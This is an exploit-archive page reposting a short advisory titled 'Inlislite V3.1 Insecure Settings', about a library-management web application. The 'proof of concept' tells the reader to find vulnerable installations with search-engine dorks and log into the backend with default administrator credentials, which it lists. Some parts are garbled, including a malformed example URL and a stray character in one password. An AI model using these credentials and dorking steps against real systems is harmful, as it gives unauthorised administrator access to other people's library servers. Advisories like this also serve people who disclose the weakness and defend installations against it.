Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023060001

Below is a copy:

Inlislite 3.1 Insecure Settings
====================================================================================================================================
| # Title     : Inlislite V3.1 Insecure Settings Vulnerability                                                                     |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Franais V.(Pro) / browser : Mozilla firefox 103.0(64-bit)                                              | 
| # Vendor    : https://inlislite.perpusnas.go.id/?read=installerphp                                                               |  
| # Dork      : Inlislite V3.1  2017 - 2018                                                                                       |
====================================================================================================================================

poc :

[+] The vulnerability is about leaving the default settings
    During the installation of the script and using the default username and password

[+] Dorking n Google Or Other Search Enggine.

[+] Use Payload : user=inlislite & pass=inlislite= or user=superadmin & pass=superadmin

[+] https://127.0.0.1.online/backend/

Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |        
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.